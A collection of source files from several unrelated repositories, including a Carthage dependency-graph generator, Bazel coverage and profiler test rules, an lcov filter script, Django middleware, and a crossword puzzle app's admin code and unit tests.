def test_amount_to_exponent():
assert isinstance(amount_to_exponent(88.99, 3), int)
assert amount_to_exponent(88.99, 3) == 88990
def test_exponent_to_amount():
assert isinstance(exponent_to_amount(10, 6), float)
assert exponent_to_amount(10, 3) == 0.01
``` |
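The conversion helpers exercised in the last two tests map card amounts to integer exponents and back; a reference re-implementation consistent with those assertions (a sketch, not the library code):
```python
def amount_to_exponent_ref(amount: float, decimals: int) -> int:
    return int(round(amount * 10 ** decimals))

def exponent_to_amount_ref(exponent: int, decimals: int) -> float:
    return exponent / 10 ** decimals

assert amount_to_exponent_ref(88.99, 3) == 88990
assert exponent_to_amount_ref(10, 3) == 0.01
```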
{
"source": "jomnius/carthage_dep",
"score": 2
} |
#### File: jomnius/carthage_dep/carthage_dep.py
```python
import os
import sys
clean_names = {
"adjust/ios_sdk": "Adjust",
"accengage-ios-sdk-releases": "Accengage",
"accengage-ios-extension-sdk-releases": "Accengage\nextension",
"usabilla-u4a-ios-swift-sdk": "Usabilla",
"test-cloud-xcuitest-extensions": "Xamarin\nXCUITest\nextensions",
"SwinjectStoryboard": "Swinject\nStoryboard",
"ios-snapshot-test-case": "iOSSnapshot\nTestCase",
}
def find_files(path, filenames):
found = []
exclude_ios = ["Carthage", ".git", "Index", "Build", "Pods"]
exclude_android = ["bundle"]
exclude_dirs = exclude_ios + exclude_android
for filename in filenames:
filename = filename.lower()
for root, dirs, files in os.walk(path):
dirs[:] = [x for x in dirs if x not in exclude_dirs]
for file in files:
if filename == file.lower():
found.append(os.path.join(root, file))
return found
def parse_cartfile(filename, show_version):
found = []
module_name = filename.split("/")[-2]
file = open(filename, "r")
for line in file:
result = []
        items = list(filter(None, line.strip().split(" ")))  # list() so len()/indexing work on Python 3
if len(items) < 3 or (items[0].startswith("#")):
continue
# Module that has dependencies
result.append(module_name)
# Dependency (full) name
dependency = parse_dependency_name(items[1])
result.append(dependency)
# Dependency (short) name with version
if show_version:
if len(items) > 3 and not items[3].startswith("#"):
items[2] = "%s %s" % (items[2], items[3])
result.append(items[2].strip('"'))
found.append(result)
file.close()
return found
def parse_dependency_name(items):
dependency_fullname = items.strip('"')
dependency_fullname = clean_dependency_name(dependency_fullname, clean_names)
dependency = list(filter(None, dependency_fullname.strip().split("/")))[-1]  # filter objects are not subscriptable on Python 3
dependency = clean_dependency_name(dependency, clean_names)
if dependency.endswith((".git", ".json", ".swift")):
dependency = dependency[: dependency.rfind(".")]
return dependency
def clean_dependency_name(name, dictionary):
return dictionary[name] if name in dictionary.keys() else name
def generate_dot_graph(files, data, show_title):
lines = []
for module in data:
for item in module:
if len(item) == 2:
(framework, dependency) = item
lines.append([framework, dependency])
elif len(item) == 3:
(framework, dependency, version) = item
lines.append(
[
framework,
dependency,
"%s\\n%s" % (dependency.split("/")[-1], version),
]
)
# lines.sort(key = lambda x:x[1])
# Dot header
graph_data = "digraph G {\nconcentrate = true\n"
if show_title:
graph_data += 'labelloc = t\nlabel = "' + ",\n".join(files) + '"\n'
graph_data += "\n"
# Dot graph
for line in lines:
if len(line) == 2:
graph_data += '"%s" -> "%s"\n' % (line[0], line[1])
elif len(line) == 3:
graph_data += '"%s" -> "%s" -> "%s"\n' % (line[0], line[1], line[2])
# Dot footer
graph_data += "}\n"
return graph_data
#####
path = os.getcwd()
# Poor man's command line parameters
# carthage_dep.py --use-resolved --ignore_version
use_resolved = False
show_version = False
show_title = False
if len(sys.argv) > 1:
for arg in sys.argv:
if arg.endswith("resolved"):
use_resolved = True
elif arg.endswith("version"):
show_version = True
elif arg.endswith("files"): # --list-files
show_title = True
files = []
if use_resolved:
files = find_files(path, ["Cartfile.resolved"])
else:
files = find_files(path, ["Cartfile", "Cartfile.private"])
found = []
for filename in files:
found.append(parse_cartfile(filename, show_version))
dot_graph = generate_dot_graph(files, found, show_title)
print(dot_graph)
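# Usage sketch (illustrative; module and dependency names are hypothetical):
# run from a checkout containing Cartfiles and pipe the dot output to graphviz,
#   python carthage_dep.py --use-resolved --show-version | dot -Tpng -o deps.png
# A Cartfile line such as
#   github "Alamofire/Alamofire" ~> 5.4
# splits into ['github', '"Alamofire/Alamofire"', '~>', '5.4'] and produces
# the edge "MyApp" -> "Alamofire" -> "Alamofire\n~> 5.4" in the graph.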
``` |
{
"source": "jomof/CppBuildCacheWorkInProgress",
"score": 2
} |
#### File: bazel/coverage/baseline.bzl
```python
load("@//tools/base/bazel:merge_archives.bzl", "merge_jars")
def setup_bin_loop_repo():
native.new_local_repository(
name = "baseline",
path = "bazel-bin",
build_file_content = """
load("@cov//:baseline.bzl", "construct_baseline_processing_graph")
construct_baseline_processing_graph()
""",
)
# correctness requires that *.coverage.baseline.srcs be deleted
# to ensure that any deleted targets do not hang around and interfere
# studio_coverage.sh does this via a `bazel clean`
# report.sh does this via an explicit `find` and `rm`
def construct_baseline_processing_graph():
srcs = native.glob(["**/*.coverage.baseline.srcs"])
# turn `package/target.coverage.baseline.srcs`
# into `package:target`
pts = [":".join(s.rsplit("/", 1)).replace(".coverage.baseline.srcs", "") for s in srcs]
native.genrule(
name = "merged-baseline-srcs",
# turn `package:target`
# into `@//package:target_coverage.baseline.srcs.filtered`
srcs = ["@//{}_coverage.baseline.srcs.filtered".format(pt) for pt in pts],
outs = ["merged-baseline-srcs.txt"],
cmd = "cat $(SRCS) | sort | uniq >$@",
visibility = ["@cov//:__pkg__", "@results//:__pkg__"],
)
merge_jars(
name = "merged-baseline-jars",
# turn `package:target`
# into `@//package:target_coverage.baseline.jar`
jars = ["@//{}_coverage.baseline.jar".format(pt) for pt in pts],
out = "merged-baseline-jars.jar",
# use this for now b/c of duplicate META-INF/plugin.xml
# theoretically allows for a duplicate class problem in Jacoco processing
# however, as these are all directly from non-transitive source class jars
# it shouldn't be a problem as we don't have overlapping source targets
allow_duplicates = True,
visibility = ["@cov//:__pkg__", "@results//:__pkg__"],
)
native.genrule(
name = "merged-baseline-exempt_markers",
# turn `package:target`
# into `@//package:target_coverage.baseline.exempt_markers`
srcs = ["@//{}_coverage.baseline.exempt_markers".format(pt) for pt in pts],
outs = ["merged-exempt_markers.txt"],
cmd = "cat $(SRCS) >$@",
visibility = ["@cov//:__pkg__"],
)
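# Label-rewrite sketch for the list comprehension above: a glob hit such as
#   "tools/base/bazel/foo.coverage.baseline.srcs"   (hypothetical path)
# becomes "tools/base/bazel:foo", which the genrules then expand to labels like
#   "@//tools/base/bazel:foo_coverage.baseline.srcs.filtered"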
```
#### File: bazel/coverage/filter_lcov.py
```python
import sys
def read_lcov():
file_line_cov = {} # map[test][file][line] = covered
current_sf = None
current_tn = None
for line in sys.stdin:
line = line.strip()
if line[:3] == "TN:":
current_tn = line[3:]
if current_tn not in file_line_cov:
file_line_cov[current_tn] = {}
elif line[:3] == "SF:":
current_sf = line[3:]
file_line_cov[current_tn][current_sf] = {}
elif line[:3] == "DA:":
[num, hit] = line[3:].split(",")
file_line_cov[current_tn][current_sf][int(num)] = hit != "0" # convert to bool
else:
pass
return file_line_cov
def is_excluded(path, excludes):
# if no excludes are specified then this is skipped and nothing is excluded
for e in excludes:
if path.startswith(e):
# matched an excluded prefix so finished with excludes
return True
return False
def is_included(path, includes):
for i in includes:
if path.startswith(i):
# matched an included prefix so finished with includes
return True
return False
def write_lcov(filtered_cov):
for tn in sorted(filtered_cov):
for filepath in sorted(filtered_cov[tn]):
sys.stdout.write('TN:{}\n'.format(tn))
sys.stdout.write('SF:{}\n'.format(filepath))
for line in sorted(filtered_cov[tn][filepath]):
sys.stdout.write('DA:{},{}\n'.format(line, int(filtered_cov[tn][filepath][line])))
sys.stdout.write('end_of_record\n')
def main():
prefixes = sys.argv[1:]
includes = [x for x in prefixes if not x.startswith("-")]
excludes = [x[1:] for x in prefixes if x.startswith("-")]
file_line_cov = read_lcov()
after_excludes = {}
for tn in file_line_cov:
after_excludes[tn] = {f: file_line_cov[tn][f] for f in file_line_cov[tn] if not is_excluded(f, excludes)}
filtered = after_excludes # by default include everything
if len(includes) > 0: # but if there are explicit includes then only include those
filtered = {}
for tn in after_excludes:
filtered[tn] = {f: after_excludes[tn][f] for f in after_excludes[tn] if is_included(f, includes)}
write_lcov(filtered)
if __name__ == '__main__':
main()
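# Worked example (hypothetical paths): given stdin records
#   TN:my_test / SF:tools/base/Foo.java / DA:1,1 / DA:2,0 / end_of_record
#   TN:my_test / SF:external/Bar.java / DA:1,1 / end_of_record
# and argv prefixes ["tools/", "-tools/base/excluded/"], only the first record
# survives (it matches an include prefix and no exclude prefix) and is
# re-emitted with DA:1,1 and DA:2,0.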
```
#### File: tests/perf-test/perf_test.bzl
```python
load("//tools/base/transport/test-framework:transport_test.bzl", "transport_test")
load("//tools/base/bazel:android.bzl", "dex_library")
# Run an integration test that verifies profiler APIs.
#
# srcs: One or more test classes to run under this test.
# test_app: A target that represents a mock app (i.e. a collection of mock
# Android activities).
def perf_test(
name,
srcs,
test_app,
deps = [],
jvm_flags = [],
data = [],
tags = [],
app_runtime_deps = [],
size = None):
# Copy the undexed version of the test app and transform its bytecode with
# profiler hooks. This is how profilers work when targeting devices that
# don't support jvmti.
native.genrule(
name = name + "_transformed_undexed",
srcs = [test_app + "_undexed_deploy.jar"],
outs = [name + "_transformed_undexed_deploy.jar"],
cmd = select({
"//tools/base/bazel:darwin": "cp ./$< ./$@",
"//tools/base/bazel:windows": "cp ./$< ./$@",
"//conditions:default": "$(location //tools/base/profiler/tests/profiler-transform-main:profilers-transform-main) ./$< ./$@",
}),
executable = 1,
exec_tools = select({
"//tools/base/bazel:darwin": [],
"//tools/base/bazel:windows": [],
"//conditions:default": [
"//tools/base/profiler/tests/profiler-transform-main:profilers-transform-main",
],
}),
tags = tags,
)
dex_library(
name = name + "_transformed",
jars = [name + "_transformed_undexed_deploy.jar"],
)
transport_test(
name = name,
srcs = srcs,
deps = deps + [
"//tools/base/profiler/tests/test-framework",
],
app_dexes = [test_app],
app_dexes_nojvmti = [
":profiler-service",
name + "_transformed",
],
app_runtime_deps = app_runtime_deps + [
"//tools/base/profiler/app:perfa_java",
"//tools/base/profiler/app:perfa_okhttp",
"//tools/base/profiler/native/agent:libsupportjni.so",
],
tags = tags,
size = size,
jvm_flags = jvm_flags,
)
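# Hypothetical BUILD-file usage of the macro above (labels are examples only):
#   load("//tools/base/profiler/tests/perf-test:perf_test.bzl", "perf_test")
#   perf_test(
#       name = "memory_test",
#       srcs = ["MemoryTest.java"],
#       test_app = ":test-app",
#   )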
``` |
{
"source": "jomono/dmarc-viewer",
"score": 2
} |
#### File: dmarc-viewer/website/middleware.py
```python
import json
from django.contrib import messages
from django.template import Template, Context
def ajax_bootstrap_message(get_response):
def middleware(request):
response = get_response(request)
if (request.is_ajax() and response["Content-Type"]
in ["application/javascript", "application/json"]):
try:
content = json.loads(response.content)
except Exception:  # body is not valid JSON; return the response unmodified
return response
content["ajax_message_block"] = Template(
"{% load bootstrap3 %}"
"{% bootstrap_messages messages %}").render(
Context({
"messages": messages.get_messages(request)
}
)
)
response.content = json.dumps(content)
return response
return middleware
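# Hypothetical settings.py wiring for the middleware factory above:
#   MIDDLEWARE = [..., "website.middleware.ajax_bootstrap_message"]
# An AJAX JSON response such as {"status": "ok"} then gains an
# "ajax_message_block" key holding the rendered bootstrap-alert HTML.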
``` |
{
"source": "jomoore/threepins",
"score": 3
} |
#### File: threepins/puzzle/admin.py
```python
import json
from xml.etree import ElementTree
from django.contrib import admin
from django.db.models import CharField
from django.forms import TextInput, FileField, ModelForm
from puzzle.models import Puzzle, Entry, Blank, Block
XMLNS = '{http://crossword.info/xml/rectangular-puzzle}'
def import_from_xml(xml, puzzle):
"""Load a puzzle from Crossword Compiler XML format into the database."""
# pylint: disable=no-member
# false +ve on xml.etree.ElementTree.Element (v1.64)
crossword = ElementTree.parse(xml).find('*/%scrossword' % XMLNS)
for word in crossword.iter('%sword' % XMLNS):
xraw = word.attrib['x'].split('-')
yraw = word.attrib['y'].split('-')
xstart = int(xraw[0])
ystart = int(yraw[0])
down = len(yraw) > 1
clue = crossword.find('*/%sclue[@word="%s"]' % (XMLNS, word.attrib['id'])).text
if 'solution' in word.attrib:
answer = word.attrib['solution']
else:
answer = ''
if down:
for y in range(ystart, int(yraw[1]) + 1):
answer += crossword.find('*/%scell[@x="%d"][@y="%d"]' %
(XMLNS, xstart, y)).attrib['solution'].lower()
else:
for x in range(xstart, int(xraw[1]) + 1):
answer += crossword.find('*/%scell[@x="%d"][@y="%d"]' %
(XMLNS, x, ystart)).attrib['solution'].lower()
# XML is 1-based, model is 0-based
xstart -= 1
ystart -= 1
entry = Entry(puzzle=puzzle, clue=clue, answer=answer, x=xstart, y=ystart, down=down)
entry.save()
def import_blank_from_ipuz(ipuz, blank):
"""Load a blank grid from an ipuz file into the database."""
data = json.loads(ipuz.read().decode('latin_1'))
for y, row in enumerate(data['puzzle']):
for x, cell in enumerate(row):
if cell == "#":
block = Block(blank=blank, x=x, y=y)
block.save()
class PuzzleImportForm(ModelForm):
"""Add an XML import field."""
file_import = FileField(label='Import from XML', required=False)
class Meta:
model = Puzzle
fields = ['number', 'user', 'pub_date', 'comments']
class EntryInline(admin.StackedInline):
"""Increase the length of the text field for puzzle clues."""
model = Entry
formfield_overrides = {CharField: {'widget': TextInput(attrs={'size':'100'})}}
class PuzzleAdmin(admin.ModelAdmin):
"""Show entries inline and allow import from XML"""
form = PuzzleImportForm
inlines = [EntryInline]
def save_model(self, request, obj, form, change):
super(PuzzleAdmin, self).save_model(request, obj, form, change)
xml_file = form.cleaned_data.get('file_import', None)
if xml_file:
import_from_xml(xml_file, obj)
class BlankImportForm(ModelForm):
"""Add an ipuz import field."""
file_import = FileField(label='Import from ipuz', required=False)
class Meta:
model = Blank
fields = ['display_order']
class BlockInline(admin.TabularInline):
"""Show blocks in a table."""
model = Block
class BlankAdmin(admin.ModelAdmin):
"""Show blocks inline and allow import from ipuz."""
form = BlankImportForm
inlines = [BlockInline]
save_as = True
def save_model(self, request, obj, form, change):
super(BlankAdmin, self).save_model(request, obj, form, change)
ipuz_file = form.cleaned_data.get('file_import', None)
if ipuz_file:
import_blank_from_ipuz(ipuz_file, obj)
admin.site.site_header = "Three Pins Administration"
admin.site.site_title = "Three Pins"
admin.site.register(Puzzle, PuzzleAdmin)
admin.site.register(Blank, BlankAdmin)
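# Shape of the XML that import_from_xml expects, inferred from the ElementTree
# queries above (illustrative only, not an authoritative schema):
#   <rectangular-puzzle xmlns="http://crossword.info/xml/rectangular-puzzle">
#     <crossword>
#       <grid> <cell x="1" y="1" solution="A"/> ... </grid>
#       <word id="1" x="1-3" y="1" solution="ab c"/>
#       <clues> <clue word="1">1a</clue> ... </clues>
#     </crossword>
#   </rectangular-puzzle>
# Coordinates are 1-based in the XML and stored 0-based on the Entry model.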
```
#### File: threepins/puzzle/tests.py
```python
from datetime import timedelta, datetime
from django.test import TestCase
from django.utils import timezone
from django.urls import reverse
from django.contrib.auth.models import User
from puzzle.models import Puzzle, Entry, Blank, Block
from puzzle.feeds import PuzzleFeed
from puzzle.construction import create_grid, create_thumbnail, get_clues, get_date_string
from puzzle.admin import import_from_xml, import_blank_from_ipuz
from visitors.models import Visitor
def get_user():
"""Helper to get the first user in the database, creating one if necessary."""
if User.objects.filter(is_superuser=False).count():
return User.objects.get(is_superuser=False)
return User.objects.create_user('test', '<EMAIL>', 'password')
def get_superuser():
"""Helper to get the superuser, creating one if necessary."""
if User.objects.filter(is_superuser=True).count():
return User.objects.get(is_superuser=True)
return User.objects.create_superuser('super', '<EMAIL>', 'password')
def create_small_puzzle():
"""Helper to insert a 3x3 puzzle into the database."""
size = 3
puzzle = Puzzle.objects.create(size=size, user=get_superuser())
Entry.objects.create(puzzle=puzzle, clue='1a', answer='ab c', x=0, y=0, down=False)
Entry.objects.create(puzzle=puzzle, clue='3a', answer='x-yz', x=0, y=2, down=False)
Entry.objects.create(puzzle=puzzle, clue='1d', answer='amx', x=0, y=0, down=True)
Entry.objects.create(puzzle=puzzle, clue='2d', answer='cnz', x=2, y=0, down=True)
return puzzle
def create_puzzle_range():
"""Helper to add a bunch of small puzzles to the database, some published and some not."""
for i in range(-2, 3):
puzzle = create_small_puzzle()
puzzle.pub_date = timezone.now() + timedelta(days=i)
puzzle.save()
def create_empty_staff_puzzle(number, pub_date):
"""Helper to add an empty puzzle belonging to staff to the database."""
return Puzzle.objects.create(number=number, user=get_superuser(), pub_date=pub_date)
class PuzzleModelTests(TestCase):
"""Tests for new puzzle creation."""
def test_default_user(self):
"""Check that the default user is applied to a new puzzle."""
get_superuser()
puz = Puzzle.objects.create(number=0, pub_date=timezone.now())
self.assertEqual(puz.user.username, 'super')
def test_default_numbering(self):
"""Check that the default puzzle number is applied to a new puzzle."""
puz = Puzzle.objects.create(user=get_user(), pub_date=timezone.now())
self.assertEqual(puz.number, 0)
puz = Puzzle.objects.create(user=get_user(), pub_date=timezone.now())
self.assertEqual(puz.number, 1)
def test_default_pub_date(self):
"""Check that the default publish date is applied to a new puzzle."""
puz = Puzzle.objects.create(number=0, user=get_user())
self.assertTrue(puz.pub_date > timezone.now())
self.assertEqual(puz.pub_date.year, 2100)
self.assertEqual(puz.pub_date.hour, 0)
self.assertEqual(puz.pub_date.second, 0)
def test_puzzle_url(self):
"""Check the absolute URL for a puzzle."""
puz = Puzzle.objects.create(user=get_user(), pub_date=timezone.now())
self.assertIn(get_user().username, puz.get_absolute_url())
self.assertIn(str(puz.number), puz.get_absolute_url())
class FeedTests(TestCase):
"""Tests for RSS feed generation."""
def test_most_recent_first(self):
"""Check that the RSS feed appears in reverse chronological order."""
create_empty_staff_puzzle(0, timezone.now() - timedelta(days=2))
create_empty_staff_puzzle(1, timezone.now() - timedelta(days=1))
create_empty_staff_puzzle(2, timezone.now())
feed = PuzzleFeed()
self.assertEqual(feed.items()[0].number, 2)
self.assertEqual(feed.items()[1].number, 1)
self.assertEqual(feed.items()[2].number, 0)
def test_published_puzzles_only(self):
"""Check that unpublished puzzles don't appear in the feed."""
create_empty_staff_puzzle(0, timezone.now() - timedelta(days=1))
create_empty_staff_puzzle(1, timezone.now())
create_empty_staff_puzzle(2, timezone.now() + timedelta(days=1))
feed = PuzzleFeed()
self.assertEqual(feed.items().count(), 2)
self.assertEqual(feed.items()[0].number, 1)
self.assertEqual(feed.items()[1].number, 0)
def test_limited_number(self):
"""Check that only the 5 most recent puzzles appear in the feed."""
num_puzzles = 10
limit = 5
for i in range(num_puzzles):
create_empty_staff_puzzle(i, timezone.now() - timedelta(days=num_puzzles - i))
feed = PuzzleFeed()
self.assertEqual(feed.items().count(), limit)
def test_staff_only(self):
"""Check that puzzles created by normal users don't appear in the feed."""
pub_date = timezone.now()
Puzzle.objects.create(number=0, user=get_superuser(), pub_date=pub_date)
Puzzle.objects.create(number=1, user=get_user(), pub_date=pub_date)
feed = PuzzleFeed()
self.assertEqual(feed.items().count(), 1)
self.assertEqual(feed.items()[0].number, 0)
class GridCreationTests(TestCase):
"""Tests for the grid rendering process."""
def test_create_grid_pattern(self):
"""Check that the small 3x3 grid is rendered with the correct block pattern."""
grid = create_grid(create_small_puzzle(), 3)
for row in range(3):
for col in range(3):
self.assertEqual(grid[row][col]['row'], row)
self.assertEqual(grid[row][col]['col'], col)
if row == 1 and col == 1:
self.assertNotIn('light', grid[row][col]['type'])
self.assertIn('block', grid[row][col]['type'])
else:
self.assertIn('light', grid[row][col]['type'])
self.assertNotIn('block', grid[row][col]['type'])
def test_create_grid_clue_numbers(self):
"""Check that numbers have been added to the correct squares."""
grid = create_grid(create_small_puzzle(), 3)
expected_numbers = [[1, None, 2], [None, None, None], [3, None, None]]
for row in range(3):
for col in range(3):
self.assertEqual(grid[row][col]['number'], expected_numbers[row][col])
def test_create_grid_letters(self):
"""Check that letters of the solution have been added to the correct squares."""
grid = create_grid(create_small_puzzle(), 3)
expected_letters = [['A', 'B', 'C'], ['M', None, 'N'], ['X', 'Y', 'Z']]
for row in range(3):
for col in range(3):
self.assertEqual(grid[row][col]['letter'], expected_letters[row][col])
def test_create_grid_borders(self):
"""Check that topmost and leftmost attributes have been applied to the borders."""
grid = create_grid(create_small_puzzle(), 3)
for row in range(3):
for col in range(3):
if row == 0:
self.assertIn('topmost', grid[row][col]['type'])
else:
self.assertNotIn('topmost', grid[row][col]['type'])
if col == 0:
self.assertIn('leftmost', grid[row][col]['type'])
else:
self.assertNotIn('leftmost', grid[row][col]['type'])
class ThumbnailTests(TestCase):
"""Tests of SVG creation for blank grids."""
def test_create_thumbnail(self):
"""Create an SVG for a 3x3 blank grid."""
blank = Blank.objects.create(id=1, size=3)
Block.objects.create(blank=blank, y=0, x=2)
Block.objects.create(blank=blank, y=1, x=0)
Block.objects.create(blank=blank, y=2, x=1)
svg = create_thumbnail(blank, 10)
self.assertIn('<svg width="30" height="30">', svg)
self.assertIn(
'rect y="0" x="0" width="10" height="10" style="fill:rgb(255,255,255);', svg)
self.assertIn(
'rect y="0" x="10" width="10" height="10" style="fill:rgb(255,255,255);', svg)
self.assertIn(
'rect y="0" x="20" width="10" height="10" style="fill:rgb(0,0,0);', svg)
self.assertIn(
'rect y="10" x="0" width="10" height="10" style="fill:rgb(0,0,0);', svg)
self.assertIn(
'rect y="10" x="10" width="10" height="10" style="fill:rgb(255,255,255);', svg)
self.assertIn(
'rect y="10" x="20" width="10" height="10" style="fill:rgb(255,255,255);', svg)
self.assertIn(
'rect y="20" x="0" width="10" height="10" style="fill:rgb(255,255,255);', svg)
self.assertIn(
'rect y="20" x="10" width="10" height="10" style="fill:rgb(0,0,0);', svg)
self.assertIn(
'rect y="20" x="20" width="10" height="10" style="fill:rgb(255,255,255);', svg)
class ClueCreationTests(TestCase):
"""Tests for clue rendering, including clue numbers and numeration."""
def test_get_clues(self):
"""Create and check the clue lists for the small 3x3 puzzle."""
puz = create_small_puzzle()
grid = create_grid(puz, 3)
across_clues = get_clues(puz, grid, False)
self.assertEqual(len(across_clues), 2)
self.assertEqual(across_clues[0]['number'], 1)
self.assertEqual(across_clues[0]['clue'], '1a')
self.assertEqual(across_clues[0]['numeration'], '2,1')
self.assertEqual(across_clues[1]['number'], 3)
self.assertEqual(across_clues[1]['clue'], '3a')
self.assertEqual(across_clues[1]['numeration'], '1-2')
down_clues = get_clues(puz, grid, True)
self.assertEqual(len(down_clues), 2)
self.assertEqual(down_clues[0]['number'], 1)
self.assertEqual(down_clues[0]['clue'], '1d')
self.assertEqual(down_clues[0]['numeration'], '3')
self.assertEqual(down_clues[1]['number'], 2)
self.assertEqual(down_clues[1]['clue'], '2d')
self.assertEqual(down_clues[1]['numeration'], '3')
class DateFormattingTests(TestCase):
"""Tests for the date format shown above the puzzle."""
def test_get_date_string(self):
"""Check that the date string is in the expected format."""
test_date = datetime(1980, 3, 4, 1, 2, 3, tzinfo=timezone.get_default_timezone())
puz = Puzzle.objects.create(user=get_user(), pub_date=test_date)
self.assertEqual(get_date_string(puz), '04 Mar 1980')
class PuzzleViewTests(TestCase):
"""Tests for the various puzzle solving views."""
def log_in_super_user(self):
"""Helper function to create and log in a superuser."""
get_superuser()
self.client.login(username='super', password='password')
def log_out_super_user(self):
"""Helper function to log out the superuser."""
self.client.logout()
def test_home_page_grid_squares(self):
"""Check that a puzzle grid has been rendered into the home page."""
create_puzzle_range()
response = self.client.get('/')
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertEqual(response.content.count('class="light'.encode('utf-8')), 8)
self.assertEqual(response.content.count('class="block'.encode('utf-8')), (15 * 15) - 8)
self.assertEqual(response.content.count('topmost'.encode('utf-8')), 15)
self.assertEqual(response.content.count('leftmost'.encode('utf-8')), 15)
self.assertEqual(response.content.count('class="grid-number"'.encode('utf-8')), 3)
self.assertEqual(response.content.count('data-a='.encode('utf-8')), 8)
for i in range(3):
search_str = 'data-x="%i"' % i
self.assertEqual(response.content.count(search_str.encode('utf-8')), 15)
search_str = 'data-y="%i"' % i
self.assertEqual(response.content.count(search_str.encode('utf-8')), 15)
def test_home_page_clues(self):
"""Check that clues have been created and inserted into the page."""
create_puzzle_range()
response = self.client.get('/')
self.assertContains(response, 'clue-box')
self.assertEqual(response.content.count('clue-number'.encode('utf-8')), 4)
def test_home_page_wrapping(self):
"""Check that the page has a title, description, and a link to the previous puzzle."""
create_puzzle_range()
response = self.client.get('/')
self.assertContains(response, '<title>Three Pins - A cryptic crossword outlet</title>')
self.assertContains(response, '<meta name="description" content="A free interactive site')
self.assertContains(response, '< Previous')
self.assertNotContains(response, 'Next >')
self.assertContains(response, reverse('solution', args=['super', 2]))
def test_home_page_contains_latest(self):
"""Check that the puzzle number matches the latest published puzzle in the database."""
create_puzzle_range()
response = self.client.get('/')
self.assertNotContains(response, 'data-number="1"')
self.assertContains(response, 'data-number="2"')
self.assertNotContains(response, 'data-number="3"')
def test_home_page_answers_hidden(self):
"""Check that the solution is not visible."""
create_puzzle_range()
response = self.client.get('/')
self.assertNotContains(response, 'class="letter"')
def test_puzzle_without_previous(self):
"""Check that there is no 'previous' link when showing the very first puzzle."""
create_puzzle_range()
response = self.client.get(reverse('puzzle', args=['super', 0]))
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertContains(response, 'data-number="0"')
self.assertNotContains(response, '< Previous')
self.assertContains(response, 'Next >')
self.assertContains(response, '<title>Crossword #0 | super | Three Pins</title>')
def test_next_and_previous(self):
"""Check that 'next' and 'previous' links are present when possible."""
create_puzzle_range()
response = self.client.get(reverse('puzzle', args=['super', 1]))
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertContains(response, 'data-number="1"')
self.assertContains(response, '< Previous')
self.assertContains(response, 'Next >')
self.assertContains(response, '<title>Crossword #1 | super | Three Pins</title>')
def test_future_inaccessible(self):
"""Check that requests for unpublished puzzles by other authors receive a 403."""
create_puzzle_range()
get_user()
self.client.login(username='test', password='password')
response = self.client.get(reverse('puzzle', args=['super', 3]))
self.assertEqual(response.status_code, 403)
response = self.client.get(reverse('solution', args=['super', 3]))
self.assertEqual(response.status_code, 403)
self.client.logout()
def test_preview_future_puzzle(self):
"""Check that previews are visible to a logged in superuser."""
create_puzzle_range()
self.log_in_super_user()
response = self.client.get(reverse('puzzle', args=['super', 3]))
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertContains(response, 'data-number="3"')
self.assertNotContains(response, 'class="letter"')
self.assertContains(response, '<title>Crossword #3 | super | Three Pins</title>')
self.log_out_super_user()
def test_solution_available(self):
"""Check that solutions are rendered into the solution page."""
create_puzzle_range()
response = self.client.get(reverse('solution', args=['super', 2]))
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertContains(response, 'data-number="2"')
self.assertEqual(response.content.count('class="letter"'.encode('utf-8')), 8)
self.assertContains(response, '<title>Solution #2 | super | Three Pins</title>')
def test_preview_solution_available(self):
"""Check that solutions are rendered into the preview solution page."""
create_puzzle_range()
self.log_in_super_user()
response = self.client.get(reverse('solution', args=['super', 3]))
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertContains(response, 'data-number="3"')
self.assertEqual(response.content.count('class="letter"'.encode('utf-8')), 8)
self.assertContains(response, '<title>Solution #3 | super | Three Pins</title>')
self.log_out_super_user()
def test_invalid_puzzle(self):
"""Check that an invalid puzzle number results in a 404."""
create_puzzle_range()
response = self.client.get(reverse('puzzle', args=['super', 100]))
self.assertEqual(response.status_code, 404)
def test_invalid_solution(self):
"""Check that an invalid solution number results in a 404."""
create_puzzle_range()
response = self.client.get(reverse('solution', args=['super', 100]))
self.assertEqual(response.status_code, 404)
def test_user_list(self):
"""Check that the user page lists all published puzzles."""
create_puzzle_range()
response = self.client.get(reverse('users'))
self.assertNotContains(response, reverse('puzzle', args=['super', 4]))
self.assertNotContains(response, reverse('puzzle', args=['super', 3]))
self.assertContains(response, reverse('puzzle', args=['super', 2]))
self.assertContains(response, reverse('puzzle', args=['super', 1]))
self.assertContains(response, reverse('puzzle', args=['super', 0]))
def test_empty_index_list(self):
"""Check that the archive page still works if there are no puzzles in the database."""
response = self.client.get(reverse('users'))
self.assertEqual(response.status_code, 200)
def test_redirect_legacy_url(self):
"""Check that the old /puzzle/N URLs redirect to the default setter."""
create_puzzle_range()
response = self.client.get('/puzzle/1', follow=True)
self.assertRedirects(response, '/setter/super/1/', status_code=301)
class PuzzleEditTests(TestCase):
"""Tests for creating and editing puzzles."""
def verify_entry(self, entry, expected):
"""Helper to check that an individual entry matches expected parameters."""
self.assertEqual(entry.puzzle, expected['puzzle'])
self.assertEqual(entry.clue, expected['clue'])
self.assertEqual(entry.answer.upper(), expected['answer'].upper())
self.assertEqual(entry.x, expected['startx'])
self.assertEqual(entry.y, expected['starty'])
self.assertEqual(entry.down, expected['down'])
def test_anon_user_no_edit_link(self):
"""Check that anonymous users don't see an edit link on the puzzle pages."""
create_puzzle_range()
response = self.client.get(reverse('puzzle', args=['super', 1]))
self.assertNotContains(response, reverse('edit', args=['super', 1]))
def test_wrong_user_no_edit_link(self):
"""Check that users don't see an edit link on puzzles belonging to other authors."""
create_puzzle_range()
get_user()
self.client.login(username='test', password='password')
response = self.client.get(reverse('puzzle', args=['super', 1]))
self.assertNotContains(response, reverse('edit', args=['super', 1]))
self.client.logout()
def test_authorised_user_edit_link(self):
"""Check that authors see an edit link on their puzzle pages."""
create_puzzle_range()
self.client.login(username='super', password='password')
response = self.client.get(reverse('puzzle', args=['super', 1]))
self.assertContains(response, reverse('edit', args=['super', 1]))
self.client.logout()
def test_wrong_user_no_edit_page(self):
"""Check that users can't get to the edit page of other users' puzzles."""
create_puzzle_range()
get_user()
self.client.login(username='test', password='password')
response = self.client.get(reverse('edit', args=['super', 1]))
self.assertEqual(response.status_code, 403)
